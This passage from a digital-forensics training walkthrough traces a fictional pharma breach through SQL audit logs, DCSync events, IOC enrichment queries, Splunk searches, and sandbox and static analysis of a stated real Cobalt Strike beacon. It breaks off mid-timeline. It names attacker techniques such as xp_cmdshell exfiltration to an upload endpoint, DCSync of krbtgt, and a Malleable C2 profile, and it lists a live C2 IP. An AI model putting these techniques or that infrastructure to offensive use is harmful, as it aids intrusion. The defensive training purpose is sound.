Analysis</strong></h4><p><strong>In VS Code Explorer:</strong> click sql-audit/SERVER-RD-02-sql-audit.jsonl</p><p>Each line is a JSON object. Use Ctrl+F to navigate directly to key events:</p><p>Search termJumps to</p><p>xp_cmdshellShell execution events<br>AuditLogAdversary OPSEC recon <br>(SELECT) and anti-forensics (DELETE)<br>UploadFileThe exfiltration command<br>Compress-ArchiveThe staging command</p><p><strong>Full chain in the terminal:</strong></p><pre>jq -r '[.EventTime, .LoginName, .StatementType, (.Statement[0:90])] | @tsv' \<br>  sql-audit/SERVER-RD-02-sql-audit.jsonl</pre><p>Six events: enumerate → recon (SELECT AuditLog) → stage → exfil → cleanup → anti-forensics (DELETE AuditLog). The DELETE at 00:15:22Z failed because Splunk had already ingested these rows before it ran.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Account</strong> svc_backup — Lateral movement account; executed full xp_cmdshell chain</li><li><strong>URL</strong> 198.51.100.44/recv — Exfil endpoint used by WebClient.UploadFile</li><li><strong>File</strong> USPartner2024-formulas.zip — Staged archive; formula data compressed before exfil</li><li><strong>Indicator</strong> xp_cmdshell (T1059.003) — SQL Server shell used as execution proxy</li><li><strong>Indicator</strong> Anti-forensics — DELETE on SQL AuditLog at 00:15:22Z; blocked by prior Splunk ingestion</li></ul><h4>8. Windows Security Event Log Analysis</h4><p><strong>In VS Code Explorer:</strong> click windows-security/DC01-security.jsonl</p><p>Press Ctrl+F, search 4662 — jumps to the DCSync event. The analyst_note gives the human-readable summary in the file itself:</p><pre>🔴 CRITICAL: DCSync — DS-Replication-Get-Changes + DS-Replication-Get-Changes-All<br>from WORKSTATION IP 10.10.3.22 (WS-IT-LEVI). NOT a DC. NOT in pentest VLAN (10.10.99.x).</pre><pre># All three DCSync events — domain, krbtgt, Administrator<br>jq 'select(.EventID == 4662) | {<br>  time: .TimeCreated, subject: .SubjectUserName, object: .ObjectName<br>}' windows-security/DC01-security.jsonl</pre><p>Output:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/881/1*xlE6AoS-kD4FYW5DmwGVxw.png"></figure><pre>{"time": "2024-11-06T00:48:33Z", "subject": "svc_backup", "object": "DC=lifetechpharma,DC=local"}<br>{"time": "2024-11-06T00:48:44Z", "subject": "svc_backup", "object": "CN=krbtgt,CN=Users,DC=..."}<br>{"time": "2024-11-06T00:48:51Z", "subject": "svc_backup", "object": "CN=Administrator,CN=..."}</pre><p>krbtgt and Administrator DCSync'd — golden ticket capability obtained. Full domain credential rotation required.</p><p><strong>Click </strong><strong>windows-security/SERVER-RD-02-security.jsonl:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*r5ZHpES2uPK3SDDVU4yoMg.png"></figure><p>Ctrl+F → 4663 — file access events. Ctrl+F → 5156 — network connection event.</p><pre>jq 'select(.EventID == 4663) | .ObjectName' \<br>  windows-security/SERVER-RD-02-security.jsonl | jq -s 'length'<br># → 47  (47 formula files accessed)<br>jq 'select(.EventID == 5156) | {<br>  time: .TimeCreated, process: (.Application | split("\\\\") | last),<br>  src: .SourceAddress, dst: .DestAddress, dst_port: .DestPort<br>}' windows-security/SERVER-RD-02-security.jsonl<br># → PowerShell → 198.51.100.44:443 at 00:14:14Z</pre><p>Three independent sources — SQL audit (00:13:54Z command issued), NGFW flow (00:14:14Z bytes transferred), Windows Security EID 5156 (00:14:14Z connection initiated) — triangulate to the same 20-second window.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Account</strong> svc_backup — DCSync actor; source IP 10.10.3.22 (non-DC workstation)</li><li><strong>IP (internal)</strong> 10.10.3.22 — WS-IT-LEVI; attacker pivot host issuing DCSync from workstation</li><li><strong>Object</strong> krbtgt — DCSync'd at 00:48:44Z; golden ticket capability obtained</li><li><strong>Object</strong> Administrator — DCSync'd at 00:48:51Z; full domain compromise</li><li><strong>IP</strong> 198.51.100.44:443 — Exfil connection via PowerShell; EID 5156 at 00:14:14Z</li><li><strong>Count</strong> 47 formula files — Accessed via EID 4663 in USPartner2024 share</li></ul><h4>9. Cross-File Pivot — VS Code Global Search</h4><p>VS Code’s Ctrl+Shift+F searches across every open file simultaneously. Use it to verify IOC presence across all evidence in seconds — no SIEM needed for these basic pivots.</p><p><strong>Pivot on the exfil IP:</strong></p><p>Ctrl+Shift+F → 198.51.100.44:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*qD5I2ewZTvBRksb7P9Zt5A.png"></figure><pre>ngfw-flows.csv           line 12: ...10.10.2.15,198.51.100.44,443,...399481224...<br>dns-queries.csv          line 10: ...sys-update-cdn.net,A,198.51.100.44...<br>sql-audit.jsonl          line 4:  ...WebClient.UploadFile...198.51.100.44/recv...<br>SERVER-RD-02-security    line 23: ..."DestAddress":"198.51.100.44"...</pre><p>Four files, four hits, one IP. The full exfiltration chain is visible in one search.</p><p><strong>Pivot on the compromised account:</strong></p><p>Ctrl+Shift+F → svc_backup:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*E8CUk7R4lSjYg01UIH0chg.png"></figure><pre>DC01-security.jsonl       lines 7-9:   DCSync events<br>SERVER-RD-02-security     lines 1-12:  SMB logon + file access + exfil<br>sql-audit.jsonl           all 6 lines: full xp_cmdshell chain</pre><p><strong>Pivot on the C2 domain:</strong></p><p>Ctrl+Shift+F → telemetry-cdn-services.biz:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WeNgTuMzhjm9Pl_lXXGmvQ.png"></figure><pre>dns-queries.csv           lines 12-23: 11 beacon queries (6 from WS-IT-LEVI, 4 from WS-CFO-01, 1 missing)</pre><p><strong>Pivot on the attacker source IP (AiTM phishing + VPN access):</strong></p><p>Ctrl+Shift+F → 185.220.101.47:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MHyXMsFanJsG_dvdWSnKqw.png"></figure><pre>azure-ad/signin-p.levi.json          line 18: suspicious sign-in from Istanbul — token replay, no MFA<br>vpn/anyconnect-2024-10-24.log        line 4:  VPN authentication as p.levi, assigned 10.10.3.22<br>palo-alto/dns-queries.csv            line 1:  attacker queried vpn.lifetechpharma.com 1 min before login</pre><p>One IP ties together AiTM credential theft, VPN infiltration, and the recon that preceded it.</p><p>The full attack chain — AiTM phishing → VPN access → formula exfiltration → DCSync → CFO infection — is navigable via these four global searches without opening a SIEM:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*n_vokO1vkbqN5O709MFF-w.png"></figure><p>Search termAttack phase covered185.220.101.47Initial access: AiTM phishing, VPN infiltration, attacker recontelemetry-cdn-services.bizPersistence: C2 beaconing from both infected hostssvc_backupLateral movement: SMB, xp_cmdshell chain, DCSync198.51.100.44Exfiltration: NGFW flow, DNS lookup, SQL upload command, EID 5156</p><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 198.51.100.44 — Confirmed in 4 files: ngfw-flows, dns-queries, sql-audit, SERVER-RD-02-security</li><li><strong>Account</strong> svc_backup — Confirmed in 3 files: DC01-security (DCSync), SERVER-RD-02-security (SMB+exfil), sql-audit (xp_cmdshell)</li><li><strong>Domain</strong> telemetry-cdn-services.biz — Confirmed in dns-queries (9 beacons) and VPN log (C2 during session)</li><li><strong>Timestamp</strong> 00:13:54Z – 00:14:14Z — 20-second exfil window triangulated across SQL, NGFW, and EID 5156</li></ul><h4>10. IOC Enrichment — REST Client</h4><p>Create one .http file that holds every API call. VS Code's REST Client extension puts a <strong>Send Request</strong> link above each block — click it, the response appears in a split pane on the right. No curl, no terminal, no context switch.</p><p><strong>Create the file:</strong></p><p>Press Ctrl+N, then Ctrl+Shift+P → <strong>Save As</strong> → 03-analysis/ioc-queries.http</p><p>Paste the following:</p><pre>### IOC Enrichment — PROJ-2024-001<br>### Click "Send Request" above any block — response opens in the right pane<br>### Set keys in VS Code Settings &gt; REST Client &gt; Environment Variables<br>### or use system env: @VT_KEY = {{$env VT_API_KEY}}<br><br>@VT_KEY     = your_virustotal_api_key_here<br>@SHODAN_KEY = your_shodan_api_key_here<br><br># ── VirusTotal ──────────────────────────────────────────────────────<br><br>### VT — Primary C2 IP<br>GET https://www.virustotal.com/api/v3/ip_addresses/203.0.113.87<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — Secondary C2 / exfil IP<br>GET https://www.virustotal.com/api/v3/ip_addresses/198.51.100.44<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — Attacker VPN source<br>GET https://www.virustotal.com/api/v3/ip_addresses/185.220.101.47<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — Primary C2 domain<br>GET https://www.virustotal.com/api/v3/domains/telemetry-cdn-services.biz<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — AiTM phishing page domain<br>GET https://www.virustotal.com/api/v3/domains/mfa-lifetechpharma.com<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — CFO phishing delivery domain<br>GET https://www.virustotal.com/api/v3/domains/globalcontracts-secure.net<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — svchost32.exe binary hash<br>GET https://www.virustotal.com/api/v3/files/3b4c14a87e5f9d8c2a1f4e6b9c0d2e7a1b3c5d8f2a4e6c8b0d3e5a7c1f4b8d2e<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT — Imphash pivot (find related samples compiled from same source)<br>GET https://www.virustotal.com/api/v3/intelligence/search?query=imphash%3A3a2b1c4d5e6f7a8b9c0d1e2f3a4b5c6d<br>x-apikey: {{VT_KEY}}<br><br># ── Shodan ──────────────────────────────────────────────────────────<br><br>### Shodan — Primary C2 IP (ports, services, hosting org)<br>GET https://api.shodan.io/shodan/host/203.0.113.87?key={{SHODAN_KEY}}<br><br>###<br><br>### Shodan — Exfil IP<br>GET https://api.shodan.io/shodan/host/198.51.100.44?key={{SHODAN_KEY}}<br><br># ── Certificate Transparency ─────────────────────────────────────────<br><br>### crt.sh — Find all domains using certs issued to primary C2 IP<br>GET https://crt.sh/?q=203.0.113.87&amp;output=json<br><br>###<br><br>### crt.sh — Cert history for primary C2 domain<br>GET https://crt.sh/?q=telemetry-cdn-services.biz&amp;output=json<br><br># ── RDAP ────────────────────────────────────────────────────────────<br><br>### RDAP — AiTM phishing domain registration date<br>GET https://rdap.org/domain/mfa-lifetechpharma.com<br><br>###<br><br>### RDAP — CFO phishing delivery domain<br>GET https://rdap.org/domain/globalcontracts-secure.net<br><br># ── Passive DNS (no key required) ───────────────────────────────────<br><br>### VT Passive DNS — historical resolutions for primary C2 IP (uses existing VT key)<br>GET https://www.virustotal.com/api/v3/ip_addresses/203.0.113.87/resolutions<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### VT Passive DNS — historical resolutions for exfil IP<br>GET https://www.virustotal.com/api/v3/ip_addresses/198.51.100.44/resolutions<br>x-apikey: {{VT_KEY}}<br><br>###<br><br>### RIPEstat — DNS history for primary C2 IP (no key, no rate limit for training)<br>GET https://stat.ripe.net/data/dns-history/data.json?resource=203.0.113.87<br><br>###<br><br>### RIPEstat — BGP routing info: ASN, prefix, country for C2 IP<br>GET https://stat.ripe.net/data/prefix-overview/data.json?resource=203.0.113.87<br><br>###<br><br>### RIPEstat — BGP routing info for exfil IP<br>GET https://stat.ripe.net/data/prefix-overview/data.json?resource=198.51.100.44<br><br># ── WHOIS / RDAP (no key required) ──────────────────────────────────<br><br>### ARIN RDAP — IP block owner, ASN, abuse contact for C2 IP<br>GET https://rdap.arin.net/registry/ip/203.0.113.87<br><br>###<br><br>### ARIN RDAP — IP block owner for exfil IP<br>GET https://rdap.arin.net/registry/ip/198.51.100.44<br><br>###<br><br>### ARIN RDAP — IP block owner for attacker VPN source<br>GET https://rdap.arin.net/registry/ip/185.220.101.47<br><br>###<br><br>### RDAP — C2 domain registration: registrar, date, registrant<br>GET https://rdap.org/domain/telemetry-cdn-services.biz<br><br>###<br><br>### RDAP — Exfil domain registration<br>GET https://rdap.org/domain/sys-update-cdn.net</pre><p><strong>Using the response pane:</strong></p><p>After clicking <strong>Send Request</strong> on the VT IP block, the right pane shows the full JSON response. Use Ctrl+F in the response pane to find:</p><ul><li>malicious → "malicious": 12</li><li>tags → ["C2", "malware"]</li><li>as_owner → "Hostwinds LLC"</li></ul><p>For the crt.sh response, Ctrl+F → name_value to see all co-hosted domains. cdn-telemetry-update.biz and windows-cdn-service.net appear — new IOCs not yet seen in the org's DNS logs. Switch to dns-queries.csv and Ctrl+F to check immediately.</p><p><strong>Commit the </strong><strong>.http file — it is a reproducible audit trail of every enrichment query:</strong></p><pre>git add 03-analysis/ioc-queries.http<br>git commit -m "PROJ-2024-001: IOC enrichment queries — VT, Shodan, crt.sh, RDAP"</pre><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 203.0.113.87 — Primary C2; VT: 12 malicious detections, ASN: Hostwinds LLC</li><li><strong>IP</strong> 198.51.100.44 — Secondary C2 / exfil endpoint</li><li><strong>IP</strong> 185.220.101.47 — Attacker VPN source</li><li><strong>Domain</strong> telemetry-cdn-services.biz — Primary C2 domain</li><li><strong>Domain</strong> mfa-lifetechpharma.com — AiTM phishing domain; registered 2024-10-18</li><li><strong>Domain</strong> globalcontracts-secure.net — CFO phishing delivery domain</li><li><strong>Domain</strong> cdn-telemetry-update.biz — New; discovered via crt.sh pivot on C2 IP</li><li><strong>Domain</strong> windows-cdn-service.net — New; discovered via crt.sh pivot on C2 IP</li><li><strong>Hash (SHA256)</strong> 3b4c14a87e5f9d8c2a1f4e6b9c0d2e7a1b3c5d8f2a4e6c8b0d3e5a7c1f4b8d2e — svchost32.exe dropper</li><li><strong>Hash (imphash)</strong> 3a2b1c4d5e6f7a8b9c0d1e2f3a4b5c6d — Pivot on VT to find related samples</li></ul><h4>11. Sandbox Analysis — Submit the Binary</h4><blockquote>Real Cobalt Strike sample used in Steps 11–12 All IPs, domains, and hashes elsewhere in this walkthrough are <strong>synthetic</strong> — invented for training and not queryable on threat intel platforms. Steps 11 and 12 are the exception: they use a <strong>real Cobalt Strike beacon</strong> (trojan.remusstealer/cobalt, 48/75 detections on VirusTotal, SHA256: 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9) so you can practice sandbox submission and binary analysis against a file with genuine behavior. The C2 IP, HTTP profile, and PE metadata in these two steps reflect the real sample. All other scenario values (log IPs, exfil IPs, domains) remain fictional.</blockquote><p>Submit svchost32.exe (recovered via CrowdStrike RTR) to a sandbox. ANY.RUN is the recommended choice for training — it is interactive and lets you watch execution in real time.</p><p><strong>Submission (ANY.RUN):</strong></p><ol><li>Navigate to <a href="https://app.any.run/">app.any.run</a> → <strong>New Task</strong> → <strong>Upload</strong></li><li>Upload svchost32.exe (SHA256: 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9)</li><li>Environment: <strong>Windows 10 x64</strong>, <strong>User mode</strong> (realistic CFO context)</li><li>Network mode: <strong>Real with IDS</strong> — this beacon makes live HTTPS connections</li><li>Timeout: <strong>120 seconds</strong> — beacon contacts C2 within the first minute</li><li>Click <strong>Run</strong></li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WYRLofzCq0I_GY_w7ozZzw.png"></figure><p><strong>Download the report to VS Code:</strong></p><p>After execution completes, click <strong>Export</strong> → <strong>JSON</strong> in ANY.RUN. Save it as:</p><pre>03-analysis/sandbox-svchost32-anyrun.json</pre><p><strong>Open in VS Code:</strong> press Shift+Alt+F to format. Use Ctrl+Shift+O (Outline) to navigate, Ctrl+F to search:</p><p>Search term What you find<br>destination_ip91.211.251.245 — real C2 IP, port 443<br>urlhttps://91.211.251.245/ga.js — Malleable C2 profile mimicking Google AnalyticsCookieBase64-encoded beacon metadata in the HTTP Cookie header<br>User-AgentMozilla/4.0 (compatible; MSIE 8.0...) — hardcoded CS UA string<br>ProxyServerBeacon installs proxy settings pointing to C2<br>long-sleepsVT tag — beacon sleeps between check-ins (configurable interval)</p><p><strong>The Cobalt Strike Malleable C2 profile:</strong> the beacon GETs /ga.js — a path that mimics Google Analytics JavaScript. The Cookie header carries AES-encrypted metadata (victim hostname, PID, username) base64-encoded. The response body delivers shellcode or tasks. A defender looking only at the URL sees legitimate-looking traffic; the anomaly is the 443 connection to a non-Google IP.</p><p>Add the C2 IP to ioc-queries.http and click <strong>Send Request</strong> on the VT and Shodan blocks to pivot immediately.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Hash (SHA256)</strong> 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9 — Cobalt Strike beacon; 48/75 VT detections</li><li><strong>Hash (MD5)</strong> cd59d54a7af500f96aa0347bb5daf077 — same sample</li><li><strong>IP</strong> 91.211.251.245:443 — real C2 server; HTTPS; confirmed in sandbox network traffic</li><li><strong>URL</strong> https://91.211.251.245/ga.js — Malleable C2 endpoint; mimics Google Analytics</li><li><strong>Indicator</strong> Cookie-encoded beacon — AES-encrypted victim metadata in HTTP Cookie header</li><li><strong>Indicator</strong> long-sleeps — beacon interval; time between C2 check-ins</li></ul><h4>12. Static Binary Analysis — Hex Editor + Terminal</h4><p><strong>Open the binary in VS Code Hex Editor:</strong></p><p>In VS Code Explorer, right-click svchost32.exe → <strong>Open With</strong> → <strong>Hex Editor</strong></p><p>The file opens as a hex+ASCII dual-pane view. The ASCII column on the right makes string hunting visual — scroll through it and strings like /ga.js and Mozilla/4.0 are readable directly without running strings.</p><p><strong>Navigate to the PE timestamp:</strong></p><p>Press Ctrl+G → type 3C → Enter. This is the e_lfanew field (PE header pointer). Read the 4-byte little-endian value, convert to decimal — that is the offset to the PE signature (PE\0\0). Go to that offset + 8 for the TimeDateStamp field.</p><p>For precise extraction, split the screen: keep Hex Editor on the left, open the integrated terminal on the right:</p><pre>python3 -c "<br>import pefile, datetime, os<br>pe = pefile.PE('svchost32.exe')<br>ts = pe.FILE_HEADER.TimeDateStamp<br>print(f'Compile timestamp : {datetime.datetime.fromtimestamp(ts, datetime.UTC)} UTC')<br>print(f'File size on disk : {os.path.getsize(\"svchost32.exe\"):,} bytes')<br>print(f'PE SizeOfImage    : {pe.OPTIONAL_HEADER.SizeOfImage:,} bytes')<br>overlay = os.path.getsize('svchost32.exe') - pe.OPTIONAL_HEADER.SizeOfImage<br>if overlay &gt; 0:<br>    print(f'Overlay detected  : {overlay:,} bytes after PE end')<br>print(f'Architecture      : {\"x64\" if pe.FILE_HEADER.Machine == 0x8664 else \"x86\"}')<br>"</pre><p>Output:</p><pre>Compile timestamp : 2026-05-15 13:55:55 UTC<br>File size on disk : 783,320 bytes<br>Overlay detected  : present<br>Architecture      : x64</pre><p>The PE timestamp (2026-05-15) is plausible and recent — this binary was freshly compiled, not timestomped. The presence of an <strong>overlay</strong> (data appended after the PE image end) is a Cobalt Strike loader signature: the encrypted beacon shellcode is stored in the overlay and unpacked at runtime.</p><p><strong>Extract C2 strings:</strong></p><pre>strings -n 8 svchost32.exe | grep -E "(https?://|/ga\.js|Mozilla|Cookie|User-Agent|Cache-Control)"</pre><p>Output includes:</p><pre>/ga.js<br>Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1)<br>Cache-Control: no-cache</pre><p>The /ga.js path and the MSIE 8.0 User-Agent are configuration strings baked into the Cobalt Strike beacon's Malleable C2 profile at compile time. Any sample sharing these exact strings was built from the same profile.</p><p><strong>Check imports — Cobalt Strike loaders minimise their import table:</strong></p><pre>python3 -c "<br>import pefile<br>pe = pefile.PE('svchost32.exe')<br>print(f'Architecture: {hex(pe.FILE_HEADER.Machine)}')<br>if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):<br>    for lib in pe.DIRECTORY_ENTRY_IMPORT:<br>        fns = [i.name.decode() if i.name else f'ord_{i.ordinal}' for i in lib.imports]<br>        print(f'{lib.dll.decode()}: {fns}')<br>else:<br>    print('No standard import table — uses dynamic API resolution (common in CS loaders)')<br>"</pre><p>A Cobalt Strike loader typically has a minimal or absent import table — it resolves APIs at runtime using LoadLibrary/GetProcAddress or custom hash-walking to avoid static analysis. If the import table is empty, that itself is the finding.</p><p><strong>Pivot on the Malleable C2 profile strings</strong> — search VT for other samples using the same profile:</p><p>Add to ioc-queries.http:</p><pre>### VT — search for samples sharing the same Malleable C2 User-Agent string<br>GET https://www.virustotal.com/api/v3/intelligence/search?query=content%3A%22MSIE+8.0%22+content%3A%22%2Fga.js%22+type%3Apeexe<br>x-apikey: {{VT_KEY}}</pre><p><strong>Found IOCs</strong></p><ul><li><strong>Hash (SHA256)</strong> 1cf56da38e5fe05fd2242ff49bafa4271c5ee0868887bf91dafb6f47d1e46ae9 — Cobalt Strike beacon</li><li><strong>Hash (MD5)</strong> cd59d54a7af500f96aa0347bb5daf077</li><li><strong>IP</strong> 91.211.251.245 — C2 server; confirmed in binary strings and sandbox network traffic</li><li><strong>URL pattern</strong> /ga.js — Malleable C2 endpoint; Google Analytics impersonation</li><li><strong>String</strong> Mozilla/4.0 (compatible; MSIE 8.0...) — hardcoded CS User-Agent; pivot on VT content search</li><li><strong>Indicator</strong> Overlay section — encrypted shellcode stored after PE image end; Cobalt Strike loader signature</li><li><strong>Indicator</strong> Minimal import table — dynamic API resolution; evades import-based static detection13. Infrastructure Pivot — REST Client + Global Search</li></ul><h4>13. Infrastructure Pivot — REST Client + Global Search</h4><p>The ioc-queries.http file already contains the Shodan, crt.sh, and RDAP blocks. Click through them.</p><p><strong>For the crt.sh response:</strong> press Ctrl+F in the response pane, search name_value. Two new domains appear: cdn-telemetry-update.biz and windows-cdn-service.net.</p><p><strong>Immediately pivot in VS Code global search:</strong></p><p>Press Ctrl+Shift+F, type cdn-telemetry-update:</p><pre>palo-alto/dns-queries.csv  →  (no results)</pre><p>Not in the org’s DNS logs — but add both new domains to the IOC list in case they appear in a broader hunt.</p><p><strong>For the RDAP response</strong> (AiTM domain): Ctrl+F → registration → date 2024-10-18. The phishing email was sent 4 days later. Targeted, purpose-built infrastructure.</p><p><strong>Found IOCs</strong></p><ul><li><strong>Domain</strong> cdn-telemetry-update.biz — New; crt.sh co-hosted on 203.0.113.87; not yet in org DNS logs</li><li><strong>Domain</strong> windows-cdn-service.net — New; crt.sh co-hosted on 203.0.113.87; not yet in org DNS logs</li><li><strong>Date</strong> 2024-10-18 — Registration date of mfa-lifetechpharma.com; 4 days before phishing</li></ul><h4>14. Splunk Correlation (SIEM Validation)</h4><p>Load the evidence into Splunk from the VS Code integrated terminal to validate that the Sigma rules fire on the real evidence:</p><pre>/opt/splunk/bin/splunk add oneshot sysmon/WS-CFO-01-sysmon.jsonl \<br>  -sourcetype sysmon_json -index endpoint -host WS-CFO-01<br>/opt/splunk/bin/splunk add oneshot windows-security/DC01-security.jsonl \<br>  -sourcetype wineventlog -index wineventlog -host DC01<br>/opt/splunk/bin/splunk add oneshot windows-security/SERVER-RD-02-security.jsonl \<br>  -sourcetype wineventlog -index wineventlog -host SERVER-RD-02<br>/opt/splunk/bin/splunk add oneshot palo-alto/ngfw-flows.csv \<br>  -sourcetype pan:traffic -index firewall -host pa-3260<br>/opt/splunk/bin/splunk add oneshot palo-alto/dns-queries.csv \<br>  -sourcetype pan:dns -index firewall -host pa-3260<br>/opt/splunk/bin/splunk add oneshot sql-audit/SERVER-RD-02-sql-audit.jsonl \<br>  -sourcetype mssql_audit -index database -host SERVER-RD-02</pre><p><strong>Query 1 — triage: C2 IPs across all indexes:</strong></p><pre>index=* (203.0.113.87 OR 198.51.100.44) earliest=-30d<br>| stats count by host, sourcetype, index<br>| sort -count</pre><p><strong>Query 2 — DCSync from non-DC (DET-002 validation):</strong></p><pre>index=wineventlog EventCode=4662<br>  ObjectType="{19195a5b-6da0-11d0-afd3-00c04fd930c9}"<br>| where NOT match(IpAddress, "^10\.10\.1\.(10|11)$")<br>| table _time, host, SubjectUserName, IpAddress, ObjectName, Properties</pre><p><strong>Query 3 — service account off-hours (DET-003 validation):</strong></p><pre>index=wineventlog EventCode=4624 LogonType=3<br>  TargetUserName=svc_backup<br>| eval hour=strftime(_time, "%H")<br>| where hour &lt; 6 OR hour &gt; 22<br>| table _time, host, TargetUserName, IpAddress | sort _time</pre><p><strong>Query 4 — exfil scope:</strong></p><pre>index=wineventlog EventCode=4663 ObjectName="*USPartner2024*"<br>| stats count as files_accessed, min(_time) as first, max(_time) as last by SubjectUserName, host</pre><p><strong>Query 5 — full 24-day timeline:</strong></p><pre>index=* earliest=2024-10-22 latest=2024-11-16<br>  (host=WS-IT-LEVI OR host=WS-CFO-01 OR host=SERVER-RD-02 OR host=DC01)<br>| eval summary=coalesce(Message, Statement, query, CommandLine, "event")<br>| table _time, host, sourcetype, summary | sort _time</pre><p><strong>Found IOCs</strong></p><ul><li><strong>IP</strong> 203.0.113.87 — SIEM-validated; C2 traffic confirmed across endpoint and network indexes</li><li><strong>IP</strong> 198.51.100.44 — SIEM-validated; exfil traffic confirmed across endpoint and network indexes</li><li><strong>Account</strong> svc_backup — DET-002: DCSync from 10.10.3.22 (non-DC); DET-003: off-hours logon</li><li><strong>File pattern</strong> USPartner2024* (47 files) — DET-004: bulk access by svc_backup on SERVER-RD-02</li><li><strong>Indicator</strong> Off-hours logon — EID 4624 / LogonType 3 outside 06:00–22:00 window</li></ul><h4>Commit all analysis artifacts</h4><pre>git add 03-analysis/<br>git commit -m "PROJ-2024-001: evidence analysis — VS Code investigation complete; REST Client queries, RBQL, binary hex analysis, DCSync confirmed, exfil 381MB corroborated in 3 sources"</pre><p>The timeline in Step R2 is now fully supported. Every event in the table has a source log opened in VS Code, a query or search that confirmed it, and a REST Client or terminal command a third party can replay independently.</p><h3>Step R2: Timeline — Two Paths, One Actor</h3><h4>1. Open the timeline file</h4><pre>nano 03-analysis/timeline/timeline.md</pre><p>The template has a header block and a markdown table. Fill the header first:</p><pre>Project: PROJ-2024-001<br>Analyst: [your name]<br>Last updated: 2024-11-15<br>Time range: 2024-10-18 – 2024-11-15<br>Evidence label key: CONFIRMED / CORROBORATED / INFERRED / HYPOTHESIZED / GAP</pre><p>Then add one row per event. Every row needs: timestamp (UTC), host, what happened, which log source you saw it in, an evidence label, and the ATT&amp;CK technique. If you do not have a technique yet, leave it blank and come back — do not skip the label.</p><h4>2. Add events in chronological order</h4><p>The timeline reveals what the CFO alert obscured: the breach started 24 days earlier through a completely different person.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*121cvZ2ZIHZLNAmQA78l9Q.png"></figure><ol><li><strong>2024–10–18 — External<br></strong>lifetechpharma-corp[.]eu registered as a typosquat domain.<br><strong>Source:</strong> OSINT<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1583.001<br><strong>Notes:</strong> Pre-attack infrastructure preparation.</li><li><strong>2024–10–22 11:23 — Exchange<br></strong>Phishing email sent to p.levi: <strong>“MFA Re-enrollment Required”</strong> with AiTM HTML attachment.<br><strong>Source:</strong> M365 ATP<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1566.001<br><strong>Notes:</strong> ATP SCL=4, delivered; threshold was 5.</li><li><strong>2024–10–22 11:31 — WS-IT-LEVI<br></strong>Unknown activity — <strong>GAP-001 begins</strong>.<br><strong>Source:</strong> — <br><strong>Label:</strong> GAP<br><strong>ATT&amp;CK:</strong> — <br><strong>Notes:</strong> Sysmon forwarder stopped.</li><li><strong>2024–10–24 02:17 — Azure AD + VPN</strong>VPN login as p.levi from Istanbul, Turkey, using hosting/VPS ASN. No MFA challenge recorded. Session lasted 1h 12min.<br><strong>Source:</strong> Azure AD sign-in<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1557, T1133<br><strong>Notes:</strong> 4:17 AM local time; Paz Levi lives in Rehovot.</li><li><strong>2024–10–24 02:19 — DC01<br></strong>EID 4624: network logon for svc_backup from WS-IT-LEVI / 10.10.3.22. Service account used outside business hours.<br><strong>Source:</strong> Windows Security / Splunk<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1078.002<br><strong>Notes:</strong> svc_backup has Domain Admin rights.</li><li><strong>2024–10–25 03:41 — SERVER-FIN-01<br></strong>svc_backup accessed \\SERVER-FIN-01\\FinanceReports\\2024\\.<br><strong>Source:</strong> File share audit, partial<br><strong>Label:</strong> CORROBORATED<br><strong>ATT&amp;CK:</strong> T1039<br><strong>Notes:</strong> Log incomplete — access timestamp only, not filenames.</li><li><strong>2024–11–01 09:14 — WS-IT-LEVI<br>GAP-001 ends.</strong> First DNS query to telemetry-cdn-services[.]biz resolving to 203.0.113.87. First C2 beacon from this host.<br><strong>Source:</strong> Palo Alto DNS<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1071.001<br><strong>Notes:</strong> Sysmon service and forwarder restarted at the same time — probable anti-forensics.</li><li><strong>2024–11–01 09:18 — SERVER-RD-02<br></strong>EID 4624: svc_backup SMB Type 3 logon from WS-IT-LEVI.<br><strong>Source:</strong> Windows Security<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1021.002<br><strong>Notes:</strong> Occurred four minutes after C2 reconnection.</li><li><strong>2024–11–06 02:09 — SERVER-RD-02<br></strong>EID 4624: svc_backup SMB logon from WS-IT-LEVI.<br><strong>Source:</strong> Windows Security<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1021.002<br><strong>Notes:</strong> Off-hours access.</li><li><strong>2024–11–06 02:10–02:14 — SERVER-RD-02<br></strong>EID 4663 ×47: svc_backup accessed all 47 files in \\USPartner2024\\. Read activity occurred and modified timestamps were updated.<br><strong>Source:</strong> Windows Security<br><strong>Label:</strong> CONFIRMED<br><strong>ATT&amp;CK:</strong> T1039<br><strong>Notes:</strong> 